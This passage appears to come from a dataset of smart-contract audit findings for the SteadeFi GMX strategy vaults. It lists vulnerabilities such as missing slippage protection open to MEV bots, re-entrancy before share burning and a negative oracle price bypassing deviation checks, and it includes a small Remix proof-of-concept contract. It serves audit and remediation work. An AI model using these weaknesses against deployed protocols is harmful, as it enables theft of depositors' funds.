English, this function in this case assumes: if the contract's balance of one of the tokens (e.g., tokenA) is insufficient to cover `tokenA` debt, it means that the contract balance of the other token (tokenB) should be greater than the debt of `tokenB`, and the value of the remaining balance of `tokenB` after paying off the `tokenB` debt should be equal or greater than the required value to cover the debt of `tokenA`\\nThe two main issues with this assumption are:\\nIf the contract balance of `tokenFrom` is not enough to be swapped for `_tokenToAmt` of `tokenTo`, the swap will revert, causing the function to revert each time it is called when the balance of `tokenFrom` is insufficient.(in most cases in delta long strategy since it's only borrow one token), This is highly likely since emergency closures occur when something detrimental has happened, (such as bad debts).\\nThe second issue arises when the balance of tokenFrom(EX: tokenA) becomes less than `_rp.repayTokenAAmt` after a swap. In this case, the `repay` call will revert when the `lendingVault` contract attempts to `transferFrom` the strategy contract for an amount greater than its balance. ex :\\n`tokenA` balance = 100, debtA = 80.\\ntokenB balance = 50 , debtB = 70.\\nafter swap `tokenA` for 20 tokenB .\\n`tokenA` balance = 75 , debtA = 80 : in this case `repay` will keep revert .\\nso if the contract accumulates bad debts(in value), the `emergencyClose()` function will always revert, preventing any debt repayment.\\nAnother critical factor to consider is the time between the `pause` action and the emergency `close` action. During periods of high volatility, the `pause` action temporarily halts the contract, but the prices of the two assets may continue to decline. The emergency `close` function can only be triggered by the owner, who operates a time-lock wallet. In the time between the `pause` and `close` actions, the prices may drop significantly and this condition will met since the `swap` is needed in almost all cases.",the debt need to be repayed in the `pause` action. and in case of `resume` just re-borrow again.,`emergencyClose()` function will consistently fail to repay any debt.\\nlenders may lose all their funds,"```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n" +Missing minimum token amounts in the emergency contract functions allows MEV bots to take advantage of the protocols emergency situation,medium,"When an emergency situation arises and the protocol pauses or resumes the operation of the vault. All funds of the vault are removed from GMX or added back to GMX without any protection against slippage. This allows MEV bots to take advantage of the protocol's emergency situation and make huge profits with it.\\nWhen an emergency situation arises the protocol owners can call the emergencyPause function to remove all the liquidity from GMX:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\nBut the minimum tokens amount to get back when removing liquidity is not provided to the RemoveLiquidityParams:\\n```\\nstruct RemoveLiquidityParams {\\n // Amount of lpToken to remove liquidity\\n uint256 lpAmt;\\n // Array of market token in array to swap tokenA to other token in market\\n address[] tokenASwapPath;\\n // Array of market token in array to swap tokenB to other token in market\\n address[] tokenBSwapPath;\\n // Minimum amount of tokenA to receive in token decimals\\n uint256 minTokenAAmt;\\n // Minimum amount of tokenB to receive in token decimals\\n uint256 minTokenBAmt;\\n // Execution fee sent to GMX for removing liquidity\\n uint256 executionFee;\\n}\\n```\\n\\nAs it is not set, the default value 0 (uint256) is used. Therefore, up to 100% slippage is allowed.\\nThe same parameters are also missing when normal operation resumes:\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n\\nTherefore, MEV bots could take advantage of the protocol's emergency situation and as these trades include all funds of the vault it could lead to a big loss.\\nIgnoring slippage when pausing could be a design choice of the protocol to avoid the possibility of a revert and pause the system as quickly as possible. However, this argument does not apply during the resume.","Implement a custom minMarketTokens parameter, but do not implement the usual slippage calculation, as this could potentially lead to new critical vulnerabilities. If for example the reason for this emergency situation is a no longer supported chainlink feed, which will lead to reverts and therefore also to DoS of the emergency close / withdraw flow.",Big loss of funds as all funds of the strategy vault are unprotected against MEV bots.,"```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n" +A bad price can be delivered in ChainlinkARBOracle,low,"When the `consultIn18Decimals()` is called, can be returned a negative value. Because not exist correct validation for negative response.\\nThe `ChainlinkARBOracle.sol` has to garantie delivered correct price. Howerver exist a potencial scenario of this situation may be breaking.\\nLets break each one part of this scenario:\\nWhen `consultIn18Decimals()` is called, and call to `consult()` this function is encharge `of` verifie each answer and delivere a price not old, not zero,non-negative and garantie `of` sequencer is up.\\nPosible scenario in `consult()` for the moment, we have: `chainlinkResponse.answer = x where x > 0` `prevChainlinkResponse.answer = y where y < 0` This is a negative value given by Chainlink\\n`_chainlinkIsFrozen()` is pass correctly\\n`_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)` evaluate the following functions:\\n`_badChainlinkResponse(currentResponse)` pass correctly.\\n`_badChainlinkResponse(prevResponse)` pass also correctly because is only check if the value is zero, but not negative see : `if (response.answer == 0) { return true; }`\\n_badPriceDeviation(currentResponse, prevResponse, token): `if( currentResponse.answer > prevResponse.answer)` remember `currentResponse.answer = x where x > 0 and prevResponse.answer = y where y < 0` So. x > y . This condition is passed successfully..\\nFor the evaluation `of` `_deviation` we have: `_deviation = uint256(currentResponse.answer - prevResponse.answer) * SAFE_MULTIPLIER / uint256(prevResponse.answer); The result will always return zero. So validation on` _badPriceDeviationof_deviation > maxDeviations[token]always returnsfalsebecause zero can never be greater for any number ofmaxDeviations[token]since it only accepts numbers `of` typeuint256 `\\nPOC :\\nThis scenario is illustrated in a minimalist example, which you can use in Remix:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n","This behavior can be mitigated by setting the correct conditional:\\n```\\nif (response.answer <= 0) { return true; }\\n```\\n\\nAlso,due of only consultIn18Decimals() is the function that is called for the protocol. Visibility to ""consult"" may be restricted. Change from ""public"" to ""internal"".","High, the base protocol is how you get the price of the securities. The answer may be different than what is allowed. Because the maximum deviations will not be counted.","```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n" +re-entrency possible on processWithdraw since external call is made before burning user's shares in Vault,medium,"re-entrency possible on processWithdraw since external call is made before burning user's shares in Vault\\n```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("""");\\n require(success, ""Transfer failed."");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXWithdraw.sol#L182-L197\\nSince the function is only accessible by keeper (likely a router), which from the example of the mockRouter, would bundle the withdraw and ""afterWithdrawalExecution"" together. However since the router is out-of-scope, and there is still a possible chance that the user can make use of the router to re-enter into the function (without re-entrency lock), and be able to drain more fund that he actually deserves. This is submitted as a medium risk.","burn user's share first, before executing external call at the end.",drain of user funds.,"```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("""");\\n require(success, ""Transfer failed."");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n" +"min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation",medium,"min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation\\nGMX provides getMarketTokenPrice on its synethicReader which leverages MarketUtils. It allows passing in index/long/short token price with min/max. The isDeposit flag would then be used to determine whether the min or max price would be used for calculating marketTokenPrice, this is important to always favor the protocol and prevent MEV.\\nHowever on the getMarketTokenInfo implemented in GMXOracle, it passes in the same price from the oracle to the min/max price for all long&short/lpToken. This implies the same pricing is used for both deposit and withdrawal, enabling user to freely deposit/withdraw without cost or slippage. Malicious users can use this to trigger rebalance, and hence deposit or withdrawal directly on GMX that benefit the attacker with the use of bundled tx.\\n```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n\\nhttps://github.com/gmx-io/gmx-synthetics/blob/613c72003eafe21f8f80ea951efd14e366fe3a31/contracts/reader/Reader.sol#L187-L206",consider adding a small fee(5bps) to buffer the price returned from `_getTokenPriceMinMaxFormatted` on both sides.,"free deposit and withdrawal due to the same token price is used for min or max price, which leading to the same marketTokenPrice calculation for deposit and withdrawal.","```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n" +Chainlinks oracle feeds are not immutable,medium,"That a chainlink oracle works does not mean it will be supported by chainlink in the future and keeps working, and it could also be possible that the address of the price feed changes. Therefore, it does not make sense to prevent price feed addresses from being updated, or removed, but the protocol prevents that.\\nThere is only one function inside ChainlinkARBOracle to update the price feed addresses:\\n```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n\\nAs we can see it will only allow to set the price feed ones and revert if trying to update, or remove a price feed. Therefore, if chainlink changes something, or the owner accidentally set the wrong address, or the protocol no longer wants to support a price feed, it can not be removed, or updated.",Chainlinks oracle feeds are not immutable\\nRemove this line:\\n```\\nif (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n```\\n,"It is not possible to remove price feeds which are no longer supported by chainlink, or update the addresses of price feeds. This can lead to a complete DoS of the underlying token.\\nAs this feeds mapping is also the only check if it is a valid token when calling the oracle and the feed can not be removed, it will always pass this check even if the protocol no longer wishes to support this token:\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n // rest of code\\n}\\n```\\n","```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n" +Unhandled DoS when access to Chainlik oracle is blocked,low,"In certain exceptional scenarios, oracles may become temporarily unavailable. As a result, invoking the `latestRoundData` function could potentially revert without a proper error handling.\\nSteadefi documentation gives special focus on Chainlink price feed dependency, (https://github.com/Cyfrin/2023-10-SteadeFi/tree/main ""Additional Context""). The concern stems from the potential for Chainlink multisignature entities to deliberately block the access to the price feed. In such a situation, using the `latestRoundData` function could lead to an unexpected revert.\\nIn certain extraordinary situations, Chainlink has already proactively suspended particular oracles. To illustrate, in the case of the UST collapse incident, Chainlink chose to temporarily halt the UST/ETH price oracle to prevent the propagation of incorrect data to various protocols.\\nAdditionally, this danger has been highlighted and very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our current scenario:\\n""While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly"".\\nAs a result and taking into consideration the recommendation from OpenZepplin, it is essential to thoroughly tackle this matter within the codebase, as it directly relates to many functionalities of the system which are based on the oracle's output.\\nAnother example to check this vulnerability can be consulted in https://solodit.xyz/issues/m-18-protocols-usability-becomes-very-limited-when-access-to-chainlink-oracle-data-feed-is-blocked-code4rena-inverse-finance-inverse-finance-contest-git\\nAs previously discussed, to mitigate the potential risks related to a denial-of-service situation, it is recommended to implement a try-catch mechanism when querying Chainlink prices in the `_getChainlinkResponse` function within `ChainlinkARBOracle.sol` (link to code below). By adopting this approach, in case there's a failure in invoking the price feed, the caller contract retains control and can effectively handle any errors securely and explicitly.\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L188-L194\\n```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n","Unhandled DoS when access to Chainlik oracle is blocked\\nWrap the invocation of the `latestRoundData()` function within a `try-catch` structure rather than directly calling it. In situations where the function call triggers a revert, the catch block can be utilized to trigger an alternative oracle or handle the error in a manner that aligns with the system's requirements.","In the event of a malfunction or cessation of operation of a configured Oracle feed, attempting to check for the `latestRoundData` will result in a revert that must be managed manually by the system.","```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n" +`Compound()` will not work if there is only TokenA/TokenB in the trove.,medium,"The compound() function is designed to deposit Long tokens, Short tokens, or airdropped ARB tokens to the GMX for compounding. However, it will only work if there is ARB token in the trove. If there are only Long/Short tokens in the trove without any ARB, the function will not work.\\nThe `compound()` function is intended to be called by the keeper once a day to deposit all the Long/Short or ARB tokens to the GMX for further compounding. However, the logic for depositing to the GMX is restricted by the condition that the trove must always hold an airdropped ARB token.\\nHere is the relevant code snippet from the GitHub repository:\\n```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nThe code checks if there is a positive `_tokenInAmt` (representing ARB tokens) and proceeds with the depositing and compounding logic. However, if there is no ARB token but only tokenA and tokenB in the trove, the compounding will not occur and the tokens will remain in the compoundGMX contract indefinitely.\\nIt is important to note that the airdrop of ARB tokens is a rare event, making it less likely for this condition to be met. Therefore, if there are no ARB tokens but a significant amount of tokenA and tokenB in the trove, the compounding will not take place.","To mitigate this issue, it is important to always check if either tokenA/tokenB or ARB is present in the trove. If either of these is present, then proceed with the compound action. Otherwise, return.\\n```\\nif (_tokenInAmt > 0 || self.tokenA.balanceOf(address(this) > 0 || self.tokenB.balanceOf(address(this)) ) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n",If the compounding doesn't happen this could lead to the indirect loss of funds to the user and loss of gas for the keeper who always calls this function just to transfer tokens and check the balance of ARB.,"```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n" +Positions may be liquidated due to incorrect implementation of Oracle logic,medium,"Steadefi checks for historical data to make sure that last price update are within maximum delya allowed and in the range of maximum % deviation allowed.\\nBut checking the historical data is incorrect according to the chainlink docs which can damage some serious logic with in the protcol\\nVault calls ChainlinkARBOracle.consult(token) to get the fair price from chainlink oracle\\n```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L62\\nwhich calls an interval function `_getPrevChainlinkResponse()` and try to fetch previous roundId price and other details\\n```\\n function _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _prevChainlinkResponse;\\n\\n (\\n uint80 _roundId,\\n int256 _answer,\\n /* uint256 _startedAt */,\\n uint256 _timestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).getRoundData(_currentRoundId - 1);\\n\\n _prevChainlinkResponse.roundId = _roundId;\\n _prevChainlinkResponse.answer = _answer;\\n _prevChainlinkResponse.timestamp = _timestamp;\\n _prevChainlinkResponse.success = true;\\n\\n return _prevChainlinkResponse;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L210\\nBut this is incorrect way of fetching historical data. chainlink docs say: `Oracles provide periodic data updates to the aggregators. Data feeds are updated in rounds. Rounds are identified by their roundId, which increases with each new round. This increase may not be monotonic. Knowing the roundId of a previous round allows contracts to consume historical data.\\nThe examples in this document name the aggregator roundId as aggregatorRoundId to differentiate it from the proxy roundId.` check here\\nso it is not mendatory that there will be valid data for currentRoundID-1. if there is not data for currentRooundId-1 then `_badPriceDeviation(currChainlinkResponse,PrevResponse)` check here will return true. Hence vault won't able to get the price of token at some specific times",Positions may be liquidated due to incorrect implementation of Oracle logic\\nAs chainlink docs says. Increase in roundId may not be monotonic so loop through the previous roundID and fetch the previoous roundId data\\npseudo code\\n```\\n iterate (from roundId-1 to untill we get previous first data corressponding to roundID){\\n if(data present for roundID){\\n fetch the data and return\\n }else{\\n again iterate to get the data\\n }\\n }\\n```\\n,"In worse case keeper won't able to get the price of token so rebalancing , debt repay won't be possible leading to liquidation breaking the main important factor of protocol\\nAlmost 70% of vault action is dependent on price of a token and not getting price will make them inactive affecting net APR","```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n" +Incorrect Execution Fee Refund address on Failed Deposits or withdrawals in Strategy Vaults,high,"The Strategy Vaults within the protocol use a two-step process for handling deposits/withdrawals via GMXv2. A `createDeposit()` transaction is followed by a callback function (afterDepositExecution() or afterDepositCancellation()) based on the transaction's success. In the event of a failed deposit due to vault health checks, the execution fee refund is mistakenly sent to the depositor instead of the keeper who triggers the deposit failure process.\\nThe protocol handles the `deposit` through the `deposit` function, which uses several parameters including an execution fee that refunds any excess fees.\\n```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to 